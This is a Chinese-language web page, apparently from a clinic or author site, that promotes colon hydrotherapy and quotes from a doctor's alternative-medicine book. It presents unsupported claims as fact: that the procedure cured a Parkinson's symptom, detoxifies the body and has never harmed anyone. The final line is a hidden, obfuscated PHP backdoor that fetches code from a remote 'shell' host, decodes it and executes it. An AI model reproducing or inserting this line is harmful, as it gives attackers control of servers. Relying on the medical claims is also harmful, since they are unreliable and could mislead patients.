收藏本站
首頁 arrow 另類醫學簡介 arrow 大腸水療法 (Colon Hydrotherapy)
大腸水療法 (Colon Hydrotherapy) 列印 E-mail
大腸水療法
「大腸水療法」是一種用水徹底清洗結腸的方法,在潔淨、隱私的舒適環境中,完成整個結腸回復的清潔過程,同時可重建結腸肌肉正常蠕動的節奏,使它獨立健康運作。

好的療法卻遭人誤解
過去國內大腸水療多由非醫療專業人員提供服務,行銷與服務方法引人爭議,衛生主管單位認為該等行銷方式有誇大醫療效果之嫌,予以取締。我認為,所有主流與另類醫療行為均不宜以商業包裝或行銷手法誇大療效,但如果能正確了解並使用大腸水療來保養腸道,對健康裨益甚大;大腸水療因政府單位的取締而被社會大眾誤解,殊為可惜!大腸水療若由醫療專業人員以正確的方式評估、施作,就能幫助患者真正體驗大腸水療的益處,並確保患者的醫療權益。

從我的體質開始改變
從小學開始,我一緊張就會拉肚子;而學生時代的大考小考最容易讓人緊張,每當我考試考到一半,舉手表示要去上廁所時,總要忍受同學的嘲笑和老師的懷疑。腸燥症是我一生的痛,所以當我知道大腸水療時,自然躍躍欲試!沒想到做過水療後那種渾身舒暢有如洗三溫暖的感覺,讓我深知大腸水療的療效。執業後,我在診所裝置一台大腸水療機,我的母親被診斷為巴金森症,嘴巴一直不自主的咀嚼,連神經內科醫師也治療無效。但神奇的是,經過第一次的大腸水療後,至今已快兩年,這個症狀從未再出現!雖然症狀恢復的學理依據仍然無法明確瞭解,但對於患者而言,怎麼好的並不重要,重要的是:「好了」!至於研究疾病產生的學理依據及治病的法則,那就是醫師的責任了。

在腸道中造一個好環境
便祕導致代謝機能惡化,使肌膚粗慥,引發肝斑、肩膀酸痛、焦躁不安、打呵欠、胸口鬱悶、頭重……等,是美容與健康的大敵;新陳代謝的不順暢,更是導致肥胖的主要原因!「大腸水療」卻能藉著清潔結腸的方式,促進代謝和消化體內多餘的廢物,達到瘦身的效果。但我們不強調大腸水療的瘦身效果,而重視它對身體健康的預防保健功能。大多數尚未認識大腸水療的人,第一個反應是「恐懼」和「抗拒」,馬上聯想到當水從肛門灌入大腸,把大腸中的糞便沖走時的感覺。其實,大腸水療並不是直接用水在高壓下將結腸內聚積的廢物大力沖走,而是採用每平方吋一磅的水壓,這比自己平時用力排便的壓力還低。

有醫師指導才可進行
施作大腸水療,一定要在醫師的指導下才可進行。大腸是人體最大的吸收器官,大腸末端腸壁上表皮可再回收維他命、礦物質、水及其他有益的物質,並排出不需要的代謝物與糞便。人體大腸腸壁應該要功能良好,能迅速排毒,否則易成慢性病。目前大腸水療是輔助療法,它是結合溫水刺激、按摩、多元化的大腸復健,用溫水浸泡、來回深度清洗。大腸水療和一般的清水灌腸Cleaning Enema不同,在精密儀器設備的協助下,更安全有效的清除大腸壁上黏結物。來回的用溫水浸潤來軟化黏結物並排出,直接且溫和的刺激腸蠕動,恢復腸肌原有的蠕動功能。大腸水療並結合按摩、腹式呼吸,直接或間接的幫助腸肌正常蠕動,同時結合營養學、腸道細菌學,重建健康的腸道機能及腸內細菌叢之正向生態。

大腸水療QA
問:做大腸水療會痛嗎?
答:水療的儀器擁有專利,並經美國FDA(衛生總署)檢驗合格。本療法在歐美醫療院所已實際操作超過二十年,尚未有任何一人在專業醫療單位因本療法發生過任何傷害。大部分的人並不感覺到痛,最多是有拉肚子時的感覺而已。

問:一般健康的人需要做大腸水療嗎?
答:美國腸胃外科醫師Dr.Lwonard Smith極力提倡大腸水療,他說一般健康的人來做大腸水療是基於預防,但是會對所排出那麼多的廢物感到驚奇。
 
問:做大腸水療腸子會不會被水壓撐破?
答:人體大腸所承受的壓力約在五磅左右,而水療機器都維持在一點四五磅以下,超過此壓力,機器就會暫停供水,所以不可能將腸子洗破;除非本身有大腸息肉炎或腫瘤破裂的情形,所以需專業醫療人員評估與施作。
 

所有另類醫學文字內容及案例介紹均為重點摘要
詳文,請至各大書局或網路書局購買(書泉出版社)九八年五月印行
劉大元醫師所著【不一樣的另類醫學】

 
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));